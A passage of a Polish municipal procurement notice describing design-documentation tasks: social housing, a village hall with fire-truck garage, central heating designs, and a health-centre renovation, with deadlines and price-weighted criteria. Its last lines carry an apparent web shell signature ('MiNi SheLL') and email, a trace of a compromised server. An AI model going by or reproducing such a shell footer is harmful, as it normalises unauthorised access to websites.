     - kosztorys inwestorski (wymiana stolarki okiennej i drzwiowej, ocieplenie, elewacja, rynny, rury spustowe, 
       parapety obróbki blacharskie) 1 egz. 
    -  specyfikacje techniczne wykonania i odbioru robót + BIOZ - 2 egz.
     - charakterystyka energetyczna budynku -  1 egz.
               
Oprócz wersji papierowej całość dokumentacji  wymienionej w punktach 1-4 ma być dostarczona na nośniku elektronicznym, wersja cyfrowa musi zawierać te same elementy co dokumentacja w formie papierowej. Rysunki, uzgodnienia i inne dokumenty należy zapisać w formacie pdf. Przedmiary należy dodatkowo zapisać z uniwersalnym rozszerzeniem (.ath).
TERMIN WYKONANIA DOKUMENTACJI PROJEKTOWEJ  (zadanie 1)- 30 dni od podpisania umowy. 
Jako termin wykonania dokumentacji projektowej, będzie uznany dzień, w którym Wykonawca złoży w imieniu Zamawiającego zgłoszenie zamiaru rozpoczęci a robót  wraz z wymaganą dokumentacją projektową..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin wykonania - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wykonanie dokumentacji  projektowych budowy, remontów i termomodernizacji budynków. 
Zadanie 2.Wykonanie  dokumentacji projektowych budowy obiektów kubaturowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Projekt budowy mieszkań socjalnych w Cywinach Dyngunach. 
    Budynek parterowy, dla 10 rodzin. Pięć mieszkań o pow. ok.35 m2 (pokój, kuchnia, łazienka) + pięć   
    mieszkań o pow.  ok. 40 m (pokój z aneksem kuchennym,  mały pokój, łazienka).Technologia tradycyjna 
   lub szkieletowa (modułowa). Zaprojektowany budynek socjalny musi spełniać warunki do otrzymania wsparcia 
    finansowego zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 29 lipca 2009 r. w sprawie finansowego wsparcia na 
   tworzenie lokali socjalnych, mieszkań chronionych i lokali wchodzących w skład mieszkaniowego zasobu gminy 
   niestanowiących lokali socjalnych (Dz.U. z 31.10.2013 r. poz. 1277).
   Jedno mieszkanie powinno być dostosowane do korzystania przez osobę niepełnosprawną poruszającą się  
   na wózku inwalidzkim.

2) Projekt budowy świetlicy wiejskiej w Niedarzynie 
    Budynek parterowy o pow. użytkowej  ok. 200 m2 
      Pomieszczenia funkcyjne: 
    - garaż  o powierzchni  ok.  60 m2 na samochód strażacki.
    - sala o pow. ok. 90 m2  
    - zaplecze sanitarno-kuchenne o pow. ok. 50 m2 ( szatnia, toaleta -dwie kabiny, kuchnia, magazyn, 
      korytarz). 
     Zaprojektowany obiekt powinien być dostosowany do korzystania przez osoby niepełnosprawne poruszające się  
     na wózku inwalidzkim.

Zakres rzeczowy przedsięwzięcia  obejmuje: 
1) Uzyskanie  mapy do celów projektowych, warunków technicznych, uzgodnień, warunków zabudowy,  opinii              i decyzji niezbędnych do wykonania projektu oraz wykonanie projektu koncepcyjnego do uzgodnienia                             z Zamawiającym.           
2) Wykonanie usługi obejmuje przekazanie Zamawiającemu następujących opracowań w formie papierowej na każdy  z projektowanych obiektów tj. dla mieszkań socjalnych w Cywinach Dyngunach i remizy OSP w Niedarzynie:
a) projektu budowlanego (projekt architektoniczno- budowlany, projekt wykonawczy)    - 4 egz.,
b) wykonanie projektów specjalistycznych (branżowych: elektryczny, wod.kan.) oraz projektu przydomowej oczyszczalni ścieków dla potrzeb budynku socjalnego w Cywinach Dyngunach  - 4 egz.
b) specyfikacji technicznych wykonania i odbioru robót + BIOZ  - 4 egz.,
c) przedmiaru robót  - 1 egz.
d) kosztorys inwestorski - 1 egz.
e) opracowania wchodzące w skład dokumentacji projektowej, należy sporządzić także w wersji elektronicznej zapisanej na nośniku elektronicznym (dopuszczalne formaty plików PDF, DWG, dla kosztorysu - .ath),
g) Wykonawca zobowiązany jest wykonać dokumentację zgodnie z obowiązującymi przepisami prawa, normami oraz zasadami współczesnej wiedzy technicznej.
4) Zaleca się, aby Wykonawca zgromadził wszelkie niezbędne informacje, które mogą być konieczne do opracowania dokumentacji, łącznie z dokonaniem wizji lokalnej terenu robót i zapoznaniem się ze stanem istniejącym.

TERMIN WYKONANIA DOKUMENTACJI PROJEKTOWYCH (zadanie 2) - 90 dni od podpisania umowy. 
Jako termin wykonania dokumentacji projektowej, będzie uznany dzień, w którym Wykonawca złoży w imieniu Zamawiającego wniosek o pozwolenie na budowę  wraz z kompletną  dokumentacją projektową..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin wykonania - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wykonanie dokumentacji  projektowych budowy, remontów i termomodernizacji budynków. 
Zadanie 3 - Wykonanie dokumentacji  projektowych centralnego ogrzewania..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)Wykonanie dokumentacji  projektowej centralnego ogrzewania świetlicy wiejskiej w Woli Folwark:
    Kubatura budynku  430 m3
    Sposób ogrzewania: gaz płynny ze zbiornika.
2)Wykonanie dokumentacji projektowych centralnego ogrzewania świetlicy wiejskiej w Draminie
    Kubatura  budynku  620 m3
   Sposób ogrzewania: wkład kominkowy z płaszczem wodnym.

W zakres zamówienia wchodzi opracowanie dokumentacji projektowej na każdy obiekt:
a)	Uzyskanie warunków technicznych, uzgodnień , opinii i decyzji niezbędnych do  wykonania projektu. 
    b) opracowanie dokumentacji projektowej - 4 egz.	
        Projekt instalacji gazowej musi być uzgodniony z rzeczoznawcą do spraw zabezpieczeń          
        przeciwpożarowych - zgodnie z Rozporządzenie Ministra Spraw Wewnętrznych i Administracji z dnia 
        7.06.2010 r.w sprawie ochrony przeciwpożarowej budynków, innych obiektów budowlanych i terenów 
        (Dz. U. 2010 r. Nr 109  poz. 719) z późn. zm.; Rozporządzeniem Ministra Spraw Wewnętrznych i 
        Administracji  z dnia 16.06.2003 r. w sprawie uzgadniania projektu budowlanego pod względem 
        ochrony przeciwpożarowej (Dz. U. z 2003 r. Nr 121,  poz. 1137) z późn. zm.;
    c) kosztorys inwestorski   - 1 egz.
    d) specyfikacje techniczne wykonania i odbioru robót -2 egz.
    e) informacja dotycząca bezpieczeństwa i ochrony zdrowia (BIOZ)-  2 egz.)
    f) oprócz wersji papierowej całość dokumentacji ma być dostarczona na nośniku elektronicznym,   
       wersja cyfrowa musi zawierać te same elementy co dokumentacja w formie papierowej. Rysunki,   
       uzgodnienia i inne dokumenty należy zapisać w formacie pdf. Przedmiary należy dodatkowo 
       zapisać z uniwersalnym rozszerzeniem (.ath).
TERMIN WYKONANIA DOKUMENTACJI PROJEKTOWYCH (zadanie 3) - 60 dni od podpisania umowy. 
Jako termin wykonania dokumentacji projektowej, będzie uznany dzień, w którym Wykonawca złoży w imieniu Zamawiającego zgłoszenie zamiaru rozpoczęcia robót budowlanych z kompletną  dokumentacją projektową..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin wykonania - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wykonanie dokumentacji  projektowych budowy, remontów i termomodernizacji budynków. 
Zadanie  4 -   Wykonanie dokumentacji projektowej remontu Ośrodka Zdrowia w Sarbiewie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Wymiary budynku:  szer.15 m (11m +4 m) ; dł. 19  m, wys.6,40 m. Budynek dwukondygnacyjny  w kształcie litery L. 
Zakres prac remontowych: 
a) przemurowanie kominów z cegły klinkierowej od wysokości stropodachu.
b) wymiana pokrycia dachowego (  zaprojektowanie nowej konstrukcji drewnianej, pokrycie dachu 
    blachodachówką, ocieplenie stropodachu),
c)  wymiana stolarki okiennej i drzwiowej wewnętrznej,  wymiana parapetów wewnętrznych,
d) termomodernizacja  budynku (ocieplenie styropianem , elewacja - tynk sylikatowy na warstwie zaprawy 
    klejowej zbrojonej siatką)
e) pasy rynnowe, rynny, rury spustowe, parapety zewnętrzne z blachy powlekanej, przemurowanie kominów, 
    obróbki blacharskie,  podbitka okapu konstrukcji dachowej z desek PCV z listwowaniem) 
f)  zaprojektowanie balustrady  i podjazdu  dla osób niepełnosprawnych,
2.Wykonanie usługi obejmuje przekazanie Zamawiającemu następujących opracowań w formie papierowej na każdy z projektowanych obiektów:
a) projektu budowlanego (elewacja, konstrukcja dachu) - 4 egz.,
b) specyfikacji technicznych wykonania i odbioru robót + BIOZ  - 4 egz.,
c) przedmiaru robót  - 1 egz.
d) kosztorys inwestorski - 1 egz. 
e) charakterystyka energetyczna budynku -  1 egz.
f)opracowania wchodzące w skład dokumentacji projektowej, należy sporządzić także w wersji elektronicznej zapisanej na nośniku elektronicznym (dopuszczalne formaty plików PDF, DWG, dla kosztorysu - .ath),

TERMIN WYKONANIA DOKUMENTACJI PROJEKTOWEJ (zadanie 4)   - 60 dni od podpisania umowy. 
Jako termin wykonania dokumentacji projektowej, będzie uznany dzień, w którym Wykonawca złoży w imieniu Zamawiającego wniosek o pozwolenie na budowę wraz z kompletnymi dokumentacjami projektowymi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin wykonania - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com